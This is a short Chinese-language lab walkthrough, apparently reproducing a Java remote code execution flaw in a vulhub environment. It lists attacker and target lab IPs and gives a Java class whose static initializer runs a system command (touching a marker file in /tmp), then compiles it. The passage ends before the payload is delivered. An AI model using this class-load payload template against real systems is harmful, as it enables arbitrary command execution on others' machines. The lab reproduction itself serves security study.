环境搭建
使用vulhub进行环境搭建,具体步骤可参考这里。
本文中环境IP地址介绍:
攻击IP:192.168.120.1
目标IP:192.168.120.161
漏洞复现
创建一个java类:
TouchFile.java
// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"touch", "/tmp/successFJ"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
编译上面创建的java类:
javac TouchFile.java
编译后同目录下回出现TouchFile.class文件